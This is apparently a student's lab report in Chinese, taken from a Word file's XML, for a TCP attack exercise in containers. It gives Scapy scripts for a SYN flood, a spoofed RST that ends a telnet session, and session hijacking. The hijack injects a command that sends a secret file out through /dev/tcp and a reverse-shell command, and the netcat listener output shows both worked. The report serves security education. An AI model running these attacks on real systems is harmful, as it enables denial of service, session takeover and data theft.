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57118133 钟杰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攻击前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[07/12/21]seed@VM:~/Desktop$ telnet 10.9.0.5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Trying 10.9.0.5...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Connected to 10.9.0.5.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Escape character is '^]'.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Ubuntu 20.04.1 LTS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7176ac9ae185 login: seed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Password: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Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-54-generic x86_64)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* Documentation:  https://help.ubuntu.com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* Management:     https://landscape.canonical.com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* Support:        https://ubuntu.com/advantage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This system has been minimized by removing packages and content that are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not required on a system that users do not log into.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To restore this content, you can run the 'unminimize' command.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The programs included with the Ubuntu system are free software;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the exact distribution terms for each program are described in the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individual files in /usr/share/doc/*/copyright.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Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by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applicable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攻击代码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#!/bin/env python3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from scapy.all import IP,TCP,send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from ipaddress import IPv4Address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from random import getrandbits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ip = IP(dst="10.9.0.5")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tcp = TCP(dport=23, flags='S')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pkt = ip/tcp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while True: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 xml:space="preserve">pkt[IP].src = str(IPv4Address(getrandbits(32))) # source iP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pkt[TCP].sport = getrandbits(16) # source ports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pkt[TCP].seq = getrandbits(32) # sequence number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 xml:space="preserve">send(pkt,verbose = 0) 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首先尝试开启一个攻击进程，Telnet victim仍然可以进入。但是同时开启三个攻击进程，Telnet victim无法连接。等待一段时间后Telnet victim从攻击进程中抢到一个空位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1.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用c语言的s</w:t>
      </w:r>
      <w:r>
        <w:t>ynflood</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只开启一个攻击进程就成功实现了攻击，原因可能是c比py</w:t>
      </w:r>
      <w:r>
        <w:t>thon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行速度快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81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2650" cy="1047750"/>
            <wp:effectExtent l="0" t="0" r="635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hd w:val="clear" w:color="auto" w:fill="auto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1.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法在d</w:t>
      </w:r>
      <w:r>
        <w:t>ocker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里修改s</w:t>
      </w:r>
      <w:r>
        <w:t>yncookies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，因为文件只读。因此直接修改y</w:t>
      </w:r>
      <w:r>
        <w:t>ml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后重新b</w:t>
      </w:r>
      <w:r>
        <w:t>uild</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，重新进行s</w:t>
      </w:r>
      <w:r>
        <w:t>ynflood</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击并进行t</w:t>
      </w:r>
      <w:r>
        <w:t>elnet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接，在v</w:t>
      </w:r>
      <w:r>
        <w:t>ictim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看建立的连接，只有t</w:t>
      </w:r>
      <w:r>
        <w:t>elnet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，没有s</w:t>
      </w:r>
      <w:r>
        <w:t>ynflood</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的连接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48425" cy="1247775"/>
            <wp:effectExtent l="0" t="0" r="317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hd w:val="clear" w:color="auto" w:fill="auto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2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首先通过telnet建立与10.9.0.5的连接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[07/12/21]seed@VM:~/Desktop$ telnet 10.9.0.5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Trying 10.9.0.5...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Connected to 10.9.0.5.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Escape character is '^]'.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Ubuntu 20.04.1 LTS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7176ac9ae185 login: seed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Password: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Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-54-generic x86_64)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* Documentation:  https://help.ubuntu.com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* Management:     https://landscape.canonical.com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* Support:        https://ubuntu.com/advantage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This system has been minimized by removing packages and content that are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not required on a system that users do not log into.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To restore this content, you can run the 'unminimize' command.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The programs included with the Ubuntu system are free software;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the exact distribution terms for each program are described in the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individual files in /usr/share/doc/*/copyright.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Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by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applicable law.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用以下攻击代码使tcp连接断开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#!/usr/bin/env python3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from scapy.all import *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ip = IP(src = "10.9.0.1",dst = "10.9.0.5")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tcp = TCP(sport=39744,dport=23,flags="R",seq=604201495)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pkt = ip/tcp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ls(pkt)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send(pkt,verbose = 0)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结果发现telnet连接被中断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Connection closed by foreign host .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto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3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在victim中/home/seed目录下创建secret并写入this is top secret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root@7176ac9ae185:/# cd /home/seed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root@7176ac9ae185:/home/seed# touch secret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root@7176ac9ae185:/home/seed# echo this is top secret&gt;secret</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>atta</w:t>
      </w:r>
      <w:r>
        <w:t>cke</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中输n</w:t>
      </w:r>
      <w:r>
        <w:t>c -lv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 9090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在v</w:t>
      </w:r>
      <w:r>
        <w:t>ictim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:t>cat /home/seed/secret&gt;/dev/tcp/10.9.0.1/9090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root@VM:/# nc -lvn 9090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Listening on 0.0.0.0 9090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Connection received on 10.9.0.5 54194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this is top secret</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来通过tc</w:t>
      </w:r>
      <w:r>
        <w:t>p session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>劫持实现该效果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首先1</w:t>
      </w:r>
      <w:r>
        <w:t>0.9.0.6telnet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接1</w:t>
      </w:r>
      <w:r>
        <w:t>0.9.0.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，查看w</w:t>
      </w:r>
      <w:r>
        <w:t>ireshark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并构造攻击代码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#!/usr/bin/env python3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from scapy.all import*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ip =IP(src="10.9.0.6",dst="10.9.0.5")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tcp = TCP(sport=50346, dport=23, flags="A", seq=2149767330, ack=387521874)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data = "\r cat /home/seed/secret &gt; /dev/tcp/10.9.0.1/9090\r"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pkt = ip/tcp/data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ls (pkt)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send (pkt, verbose=0)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在attacker上开启nc，执行攻击代码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root@VM:/# nc -lvn 9090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Listening on 0.0.0.0 9090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Connection received on 10.9.0.5 54242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this is top secret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用10.9.0.6telnet10.9.0.5，查看wireshark并构造攻击代码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#!/usr/bin/env python3 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from scapy.all import*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ip =IP(src="10.9.0.6",dst="10.9.0.5")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tcp = TCP(sport=50350, dport=23, flags="A", seq=574877047, ack=1665280728)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data = "\r /bin/bash &gt; /dev/tcp/10.9.0.1/9090 0&lt;&amp;1 2&gt;&amp;1\r"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pkt = ip/tcp/data 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ls (pkt) </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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send (pkt, verbose=0)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[07/12/21]seed@VM:~/.../Labsetup$ docksh f3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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在attacker上开启nc，执行攻击代码，结果如下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root@VM:/# nc -lnv 9090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Listening on 0.0.0.0 9090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Connection received on 10.9.0.5 54246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secret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pwd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/home/seed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cat secret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this is top secret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shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default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FTT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A2E5E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="CB6A2E5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B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终结的电脑</dc:creator>
  <cp:lastModifiedBy>终结的电脑</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-12T01:20:22Z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